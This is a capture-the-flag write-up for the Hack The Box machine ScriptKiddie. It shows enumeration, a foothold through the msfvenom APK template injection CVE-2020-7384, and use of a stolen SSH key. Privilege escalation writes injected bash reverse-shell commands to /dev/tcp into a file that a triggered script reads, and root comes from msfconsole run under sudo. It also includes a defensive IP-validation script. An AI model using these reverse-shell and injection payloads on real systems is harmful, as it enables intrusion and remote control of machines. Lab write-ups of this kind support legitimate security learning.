HTB ScriptKiddie

2021-06-16

In ScriptKiddie, we compromise a server run by a pair of script kiddies who use an outdated version of msfvenom, and then chain several misconfigurations to achieve root access.

Enumeration

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 15:33 UTC
Nmap scan report for 10.10.10.226
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.26 seconds

Nmap shows there is an SSH server, which will be quite useful later. For now, since there are no known credentials and no obvious vulnerability, take a look at the web server on port 5000.

The site is a single page of various h4ck3r t00l5: Nmap, an msfvenom payload generator, and a search bar for Exploit DB. There doesn't seem to be a whole lot more on the web server. Payloads can be generated and there is an upload feature, but outside of that and viewing the output from Exploit DB and Nmap there isn't much on the site.

Foothold

It's worth fuzzing the nmap, exploit-db, and msfvenom input fields with various special characters to see if there is a way to break them and achieve code execution. This doesn't yield much, and it seems there is some level of filtering in place.

However, there is another place to provide user input: the msfvenom template upload. Playing around with the parameters shows that the Windows payload expects an EXE, Android expects an APK, and Linux would like an ELF. However, it doesn't seem to work properly and just returns "Something went wrong", which is not very descriptive for troubleshooting.

It turns out that CVE-2020-7384 is a vulnerability in msfvenom that allows for code injection using APK template files. The nvd.nist.gov page for it links to a Metasploit module.

A module has also been included in msfconsole. Finding and configuring it is fairly trivial.

A payload is generated and then stored. Start a netcat listener with nc -lnvp 4444, and upload the malicious APK to the server.

After a few minutes of loading, the listener gets a callback.

The callback comes back as the user kid, who has a private SSH key in /home/kid/.ssh/id_rsa. That can be copied to an attacker's machine, its permissions changed with chmod 600 kid-id_rsa, and then used to SSH right in and collect user.txt.

Privilege Escalation

kid doesn't seem to be in any interesting groups, nor do we have credentials to try and abuse, so we check through the code of the webapp to see if there is anything that can be used.

IPs from requests that are marked as containing special characters are written to a hackers file, which appears to be empty, though kid does have write permission to it. Expanding the search beyond kid's home directory finds another user, pwn. Checking out his directory reveals a nicely named script called scanlosers.sh.

[Image: scanlosers.sh]

It collects input from the hackers file found earlier. One option would be to try to provide it with input that launches a reverse shell. An attacker can stand up a netcat listener with nc -lnvp 1234 and start trying to get a working payload.

The following is a good starting point:

echo "bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1'" > /home/kid/hackers

Unfortunately, nothing comes back. A space and a semicolon can be added to make sure we escape the current command:

echo " ;bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1'" > /home/kid/hackers

The netcat listener gets a connection!

Which promptly dies with "ambiguous redirect".

It's likely that whatever comes after the reverse shell in the scanlosers.sh script is doing odd things to it. A solution is to comment it out:

echo " ;bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1' # " > /home/kid/hackers

Bingo. This time the callback is stable. pwn is also kind enough to have a handy SSH key.
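The root cause of this escalation is that whatever the hackers file contains ends up inside a shell command. As an added, defender-side example that is not part of the original writeup (scanlosers.sh itself is only shown in the screenshot, so the "one IP per line" format and the file name are assumptions), the filter below allows through only well-formed IPv4 addresses and drops the injected line from above before it can reach any command.

```shell
#!/bin/sh
# Added example, not code from the box: strictly validate a "one IP per
# line" file (assumed format of /home/kid/hackers) before any line is used
# in a shell command. Anything that is not exactly a dotted quad (spaces,
# ';', quotes, '#', redirections) is silently dropped.

# Print only the lines of $1 that are a syntactically valid IPv4 address.
filter_ipv4_lines() {
    grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' "$1" | while IFS= read -r ip
    do
        # The regex alone accepts octets like 300; check the range too.
        ok=1
        old_ifs=$IFS; IFS=.
        for octet in $ip; do
            [ "$octet" -le 255 ] || ok=0
        done
        IFS=$old_ifs
        [ "$ok" -eq 1 ] && printf '%s\n' "$ip"
    done
}

# Number of lines of $1 that survive the filter (useful for a quick check).
count_valid() {
    filter_ipv4_lines "$1" | wc -l | tr -d ' '
}

# Constructed sample input: two good addresses, one with an out-of-range
# octet, and the injection line used in the writeup.
sample=$(mktemp)
cat > "$sample" <<'EOF'
10.10.14.20
192.168.1.300
 ;bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1' # 
10.10.10.226
EOF

# Only the two valid addresses are printed; the other lines never reach
# a command line.
filter_ipv4_lines "$sample"
```

Whitelisting the exact expected shape of each field is the fix here; trying to blacklist characters like ';' and '#' is what the web app's own filtering attempted, and it still left this path open.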

Root

Once again, pwn isn't in any interesting groups, nor are there credentials to try, but sudo -l reveals they can run a command with root privileges without authentication.

msfconsole can be started with root privileges. Not exactly the best sudo configuration. Launching msfconsole gives us full root privileges, and nothing says we need to attack a remote target. Instead, commands can be executed directly on the current system.

Wrap Up

All in all, this was a pretty easy box and probably one of the shortest writeups I have written. That said, I really enjoyed it. In part it was nice to have a break from boxes where I had to think a lot harder, and I also really enjoyed the theme of exploiting the infrastructure of a couple of script kiddies. Thank you very much 0xdf for all the hard work you put into making this machine.

Side note: some of you may be wondering how scanlosers.sh was being run. It looks like a cron job, but if you checked cron while enumerating, you won't find it. It's instead using something called incron which, instead of being time based, is triggered by file system events. It runs scanlosers.sh when it detects a write to hackers. It's a pretty neat trick that I should find a use for someday.
